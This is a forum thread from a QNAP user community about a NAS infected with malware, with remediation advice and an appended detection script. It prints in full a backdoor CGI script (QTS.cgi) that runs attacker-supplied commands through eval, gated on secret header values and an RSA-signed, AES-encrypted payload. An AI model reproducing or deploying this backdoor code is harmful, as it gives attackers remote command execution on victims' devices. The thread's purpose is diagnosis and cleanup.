Virus on my QNAP?

dolbyman
Guru
Posts: 35253
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Virus on my QNAP?

Post by dolbyman »

post in codewraps or attach to forum, hard to judge without info
jezz
Starting out
Posts: 13
Joined: Tue Apr 20, 2010 12:16 am

Re: Virus on my QNAP?

Post by jezz »

@Dolbyman:

I don't know how to attach the file to this post, therefore this is the information I can provide:

- I refer to the following file:

Code: Select all

[/etc/config] # ls -le init.sh
-rwxr-xr-x    1 admin    administ      2736 Wed Nov 26 16:32:47 2014 init.sh*
- I own a TS-459 Pro with the latest firmware (updated today).

- As I cannot attach the actual file, I hereby include a part (the first part) of the file:

OneCD
Guru
Posts: 12147
Joined: Sun Aug 21, 2016 10:48 am
Location: "... there, behind that sofa!"

Re: Virus on my QNAP?

Post by OneCD »

Well, it starts with ELF so it's a binary executable. Wouldn't recommend running it though. ;)

Try showing the text strings:

Code: Select all

strings /etc/config/init.sh

jezz
Starting out
Posts: 13
Joined: Tue Apr 20, 2010 12:16 am

Re: Virus on my QNAP?

Post by jezz »

Output from the proposed command:

Code: Select all

[/etc/config] # strings /etc/config/init.sh
UWVS
[^_]
SVW1
_^[]
[^_]
[^_]
[^_]
[^_]
PPWj
PPWj
QQWj
PPWj
SSWj
ZYWj
[^_]
[^_]
WVSQ
Hu6F
Y[^_]
jC@}x
}PzdH
/usr/bin/sh
/bin/ash
OneCD
Guru
Posts: 12147
Joined: Sun Aug 21, 2016 10:48 am
Location: "... there, behind that sofa!"

Re: Virus on my QNAP?

Post by OneCD »

Ah, nothing revealing then. :?

AlastairStevenson
Experience counts
Posts: 2415
Joined: Wed Jan 08, 2014 10:34 pm

Re: Virus on my QNAP?

Post by AlastairStevenson »

My only worry (for now) is the init.sh file in /etc/config. If someone knows if this can be deleted as it contains no normal script commands....
That's certainly going to be malicious. Quite likely the malware foothold.
Drop a copy on to virustotal.com and see if it's recognised malware.
TS-431+ for storage and media and a bunch of IP cams under Surveillance Station. TVS-473 as files backup and QVR Pro.
jezz
Starting out
Posts: 13
Joined: Tue Apr 20, 2010 12:16 am

Re: Virus on my QNAP?

Post by jezz »

Hi @Alastair-Stevenson,

I dropped the file at virustotal.com.

Herewith the results:

Code: Select all

0 / 57
No engines detected this file
SHA-256	f12393982971024695b32caecdf16f4c96fe68a765949727f6a1b84e2eecbb6d
File name	init.sh
File size	2.67 KB
Last analysis	2015-06-04 10:31:24 UTC
Details:

Code: Select all

Basic Properties
MD5	59b6fdd280fe35f41f77065d3d8a69bf
SHA-1	774b1fd8d6050fa2f7661060bac1a88acc3a6fce
File Type	ELF
Magic	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
SSDeep	48:fQdCFNsQhYEqlhGgP66RaCHhOA5Nmh6rYIBCYwZX6MODXOB:fEC3sQRqlhGcRzpnOOpBC9X6PD+B
TRiD	ELF Executable and Linkable format (generic) (100%)
File Size	2.67 KB
Tags
elf
History
First Submission	2015-06-04 10:31:24
Last Submission	2015-06-04 10:31:24
Last Analysis	2015-06-04 10:31:24
File Names
init.sh
ELF Info
Header
Class	ELF32
Data	2's complement, little endian
Header Version	1 (current)
OS ABI	UNIX - System V
ABI Version	0
Object File Type	EXEC (Executable file)
Required Architecture	Intel 80386
Object File Version	0x1
Program Headers	1
Section Headers	0
Contained Segments
LOAD
ExifTool File Metadata
CPUArchitecture	32 bit
CPUByteOrder	Little endian
CPUType	i386
FileType	ELF executable
MIMEType	application/octet-stream
ObjectFileType	Executable file
I have restarted the NAS today and determined the last time this file was accessed (using ls -lu). After the reboot the file wasn't accessed. So it might be that the malware -in the directory of autorun.sh (so not on the disks but on the NAS itself)- is the trigger that starts this 'malware?' executable. I will frequently check whether the file has been accessed and look for all other changes which indicate the malware might still be there.
jezz
Starting out
Posts: 13
Joined: Tue Apr 20, 2010 12:16 am

Re: Virus on my QNAP?

Post by jezz »

Malware is still there.
After a reboot it creates at least one file in /home/httpd/cgi-bin/qid named QTS.cgi

I have added the content of this file below (malware remover deletes this file but not the creator..)
Does anyone know what it does (my knowledge of linux script is too limited)???

Code: Select all

[/home/httpd/cgi-bin/qid] # more QTS.cgi
#!/bin/sh
genrstr () 
{ 
    local s=;
    local min=${1:-4};
    local max=${2:-12};
    local kspace="${3:-a-zA-Z}"
    tr -dc "$kspace" < /dev/urandom | { 
        read -rn $(($RANDOM % ( $max - $min + 1 ) + $min )) s;
        echo "$s"
    }
}
command -v mktemp > /dev/null 2>&1 || mktemp () { 
local suffix=`genrstr 6 6`
test "$2" && { mkdir "${2%XXXXXX}$suffix"; echo "${2%XXXXXX}$suffix"; } || { touch "${1%XXXXXX}$suffix"; echo "${1%%XXXXXX}$suffix"; }
}
exec 2>/dev/null
PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
test ! -z "${QUERY_STRING}" || { printf "Date: "; TZ=UTC date; exit 0; }
echo "Date: Fri Nov 18 22:06:14 GMT 2016"
cr=`printf '\r' || echo -ne '\r'`
test "${#cr}" -eq 1 && echo "$cr" || echo ""
test "x$HTTP_REFERER" = "x41f8047417288c333cd56c0b26a3db0d00f0c90e" || exit 0
test ! -z "${0}" && test `ps aux | grep "${0}" | wc -l` -gt 40 && exit 0
command -v openssl >/dev/null 2>&1 && {
POSTDATA=''
k="1PfFPWcCBz6LlhdAgRf4oZPNe3IvNQ6U"
test "x${REQUEST_METHOD}" = xPOST && test ! -z "${QUERY_STRING}" && case "${QUERY_STRING}" in '' | *[!0-9]* | 0* ) false ;; [0-9][0-9][0-9][0-9][0-9][0-9][0-9][0-9] ) d="$(( `date +%s` / 100 ))"; test "${QUERY_STRING}" = "${d}" && ct="$d" || { test "${QUERY_STRING}" = "$(( $d - 1))" && ct="$(( $d - 1 ))"; } ;; *) false ;; esac && test ! -z "${QUERY_STRING}" && {
nl='
'
case "${CONTENT_LENGTH}" in '' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` || exit 0
s="${POSTDATA##*.}"
st="${s##*-}"
s="${s%%-*}"
d="$(( $d / 1000 ))"
test ! -z "$d" && test ! -z "$st" && test "${#st}" = 5 && { test "x$st" = "x$d" || test "x$st" = "x$(( $d - 1 ))"; } || { test -f "$t" && rm "$t"; exit 0; }
case "$s" in '' | *[!a-zA-Z0-9/+=$nl]* ) test -f "$t" && rm "$t"; exit 0; ;; esac
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----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-----END PUBLIC KEY-----
EOF
test ! -z "$s" && h=`openssl base64 -d <<EOF | openssl rsautl -pubin -inkey "$t" -verify
$s
EOF
` || { test -f "$t" && rm "$t"; exit 0; }
test -f "$t" && rm "$t"
m="${POSTDATA%%.*}"
POSTDATA=''
case "$m" in '' | *[!a-zA-Z0-9/+=$nl]* ) exit 0 ;; esac
k=`openssl dgst -sha1 -binary -hmac "$ct" <<EOF | openssl base64
$k
EOF                         
`
m=`openssl enc -d -aes-256-cbc -k "$k" -md sha1 -salt -a <<EOF
$m
EOF
`
mh=`openssl dgst -sha1 -binary -hmac "$st" <<EOF | openssl base64
$m
EOF
`
test ! -z "$h" && test "$h" = "$mh" || exit 0
eval "$m"
true
} || {
t=`mktemp /tmp/.tmp.XXXXXX` || exit 0
cat > "$t" <<"EOF" || { test -f "$t" && rm "$t"; exit 0; }
-----BEGIN PUBLIC KEY-----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-----END PUBLIC KEY-----
EOF
openssl rsautl -pubin -inkey "$t" -encrypt <<EOF | openssl base64
$k
EOF
rm "$t"
true 
}; true; } || {
test "x$ACCEPT_LANGUAGE" = "x11238f2b4a7c2089afd1301374a658cfa8562ec6" && eval "$HTTP_USER_AGENT"
}
test -f "$t" && rm "$t"
sleep 1
exit 0
dolbyman
Guru
Posts: 35253
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Virus on my QNAP?

Post by dolbyman »

contact qnap for assistance
Trexx
Ask me anything
Posts: 5393
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Virus on my QNAP?

Post by Trexx »

I would say nothing good, by the little bit of it I understand. I would make sure your router is set to block all QNAP incoming ports, and make sure UPnP and probably, for the time being, myqnapcloud are disabled, etc.

If you are running the latest QTS version, look in Control Panel / Hardware and uncheck "Run user defined processes". You should also click the View Autorun.sh link to see if anything is listed there.
Paul

Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350

Model: TVS-673 32GB & TS-228a Offline
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
dolbyman
Guru
Posts: 35253
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Virus on my QNAP?

Post by dolbyman »

Trexx wrote:You should also click the View Autorun.sh link to see if anything is listed there.

autorun.sh is apparently infected, with encrypted commands (?!?!)
Trexx
Ask me anything
Posts: 5393
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Virus on my QNAP?

Post by Trexx »

dolbyman wrote:
Trexx wrote:You should also click the View Autorun.sh link to see if anything is listed there.

autorun.sh is apparently infected, with encrypted commands (?!?!)
That's why I recommended UNCHECKING it :)
Paul

Model: TS-877-1600 FW: 4.5.3.x
QTS (SSD): [RAID-1] 2 x 1TB WD Blue m.2's
Data (HDD): [RAID-5] 6 x 3TB HGST DeskStar
VMs (SSD): [RAID-1] 2 x1TB SK Hynix Gold
Ext. (HDD): TR-004 [Raid-5] 4 x 4TB HGST Ultastor
RAM: Kingston HyperX Fury 64GB DDR4-2666
UPS: CP AVR1350

Model: TVS-673 32GB & TS-228a Offline
-----------------------------------------------------------------------------------------------------------------------------------------
2018 Plex NAS Compatibility Guide | QNAP Plex FAQ | Moogle's QNAP Faq
jezz
Starting out
Posts: 13
Joined: Tue Apr 20, 2010 12:16 am

Re: Virus on my QNAP?

Post by jezz »

Thanks @Trexx and @dolbyman,

There is no option to run user defined processes (probably because the highest version for 459Pro is 4.2.6 and not a 4.3.* version).
I have blocked all ports in my router and disabled the NAS from configuring my router.

I will contact QNAP for assistance.

Just to review my findings and actions taken (not in actual sequence):
- Removed all infected *.cgi files from /home/httpd/cgi-bin (and its subdirectories)
- Removed the malware entry in crontab
- Removed hidden .RMM... directory (I believe it was /share/MD0_DATA/.qpkg)
- Removed all additions in script files of installed packages (as added after the first line in the file .. )
- Removed autorun.sh and a malware executable from the startup directory (sdx6 device I believe)
- Restarted the NAS several times
- Installed latest firmware
- Changed all passwords for users
- Removed all non-essential packages
- Installed latest Malware Remover
- Keeping an eye on init.sh (still don't know if it can be deleted)
- Changed the names of the following files (as I don't trust them)

Code: Select all

-rw-r--r--    1 admin    administ       193 Sep 13 03:52 FVsSlowcXu
-rw-r--r--    1 admin    administ       393 Sep 13 03:52 NihLqRdqovnhIHi
-rw-r--r--    1 admin    administ      1679 Sep 13 03:52 gilgagrq
- Just noticed a user [sshd] (yes, including the square brackets) has been added to the passwd file... I don't know if this is normal .. I don't know if this is also part of the malware .. potentially enabling access via sshd/ssh to QNAP systems??

Will keep you informed if I make any progress. If anyone has any brilliant thoughts, please share them.
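The checks below are an added example, not a script posted in the thread: they look for three of the indicators discussed above, a *.sh file in /etc/config that begins with the ELF magic bytes instead of "#!", a passwd entry with an unusual name such as [sshd], and a CGI or autorun script that decodes or decrypts data and hands it to eval the way the posted QTS.cgi does. The root-directory parameter and the conservative username character set are my assumptions, chosen so the checks can be tried on a constructed directory tree before running them on a live NAS.

```shell
#!/bin/sh
# Added example (not from the thread). All paths are parameters so the
# functions can be exercised against a constructed tree as well as a live box.

# Print every *.sh in a directory whose first four bytes are the ELF magic
# (7f 45 4c 46). A shell script starts with "#!", so an ELF header is exactly
# what made /etc/config/init.sh suspicious in the thread.
find_elf_disguised_as_script() {
    dir="$1"
    for f in "$dir"/*.sh; do
        [ -f "$f" ] || continue
        magic=$(od -An -N4 -tx1 "$f" | tr -d ' \n')
        [ "$magic" = "7f454c46" ] && echo "$f"
    done
    return 0
}

# Print usernames from a passwd-format file containing characters outside the
# (assumed) safe set [A-Za-z0-9._-]; "[sshd]" from the thread would be flagged.
find_odd_passwd_users() {
    awk -F: '$1 ~ /[^A-Za-z0-9._-]/ { print $1 }' "$1"
}

# Print scripts that both call eval and decode/decrypt data with openssl or
# base64, the pattern QTS.cgi follows before running its payload.
find_eval_of_decoded_data() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        if grep -q 'eval' "$f" && grep -Eq 'openssl (enc|base64)|base64 -d' "$f"; then
            echo "$f"
        fi
    done
    return 0
}

# Run all checks under a root directory; on a live QNAP: triage /
triage() {
    root="${1%/}"
    find_elf_disguised_as_script "$root/etc/config"
    find_odd_passwd_users "$root/etc/passwd"
    find_eval_of_decoded_data "$root"/home/httpd/cgi-bin/*/*.cgi \
                              "$root"/etc/config/autorun.sh
}
```

Every line printed is a finding to investigate, not proof of compromise; a legitimate script that legitimately evals decoded data would also be listed.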
jezz
Starting out
Posts: 13
Joined: Tue Apr 20, 2010 12:16 am

Re: Virus on my QNAP?

Post by jezz »

Ticket to QNAP submitted.
Paul Sweeney
Starting out
Posts: 23
Joined: Wed Oct 15, 2014 12:00 am

Re: Virus on my QNAP?

Post by Paul Sweeney »

Anyone else getting these messages?

Running AVG on my laptop I am prevented from accessing my QNAP TS412 and am getting the following messages:
"aborted connection on qnapcloud.... because it was infected with Win32:Malware-gen"
ditto but with "JS:Redirector-BWW"
I've checked that the NAS is up to date with virus database and has recently scanned with no reported issues. Is this for real and if so, why is the NAS antivirus not picking it up? Should I/can I run Spybot S&D on the NAS?

Advice appreciated!
QNAP TS412